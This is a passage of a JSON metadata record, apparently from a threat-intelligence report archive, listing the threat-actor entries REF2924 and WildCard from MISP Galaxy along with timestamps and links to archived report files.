			"id": "dbee5a02-e2d6-49d2-9bb5-5a9e93fd1de9",
			"created_at": "2023-11-07T02:00:07.108976Z",
			"updated_at": "2026-04-10T02:00:03.411448Z",
			"deleted_at": null,
			"main_name": "REF2924",
			"aliases": [],
			"source_name": "MISPGALAXY:REF2924",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "256a6a2d-e8a2-4497-b399-628a7fad4b3e",
			"created_at": "2023-11-30T02:00:07.299845Z",
			"updated_at": "2026-04-10T02:00:03.484788Z",
			"deleted_at": null,
			"main_name": "WildCard",
			"aliases": [],
			"source_name": "MISPGALAXY:WildCard",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434111,
	"ts_updated_at": 1775826722,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/667339bc841ad89e550b874079da69e6d7493083.pdf",
		"text": "https://archive.orkl.eu/667339bc841ad89e550b874079da69e6d7493083.txt",
		"img": "https://archive.orkl.eu/667339bc841ad89e550b874079da69e6d7493083.jpg"
	}
}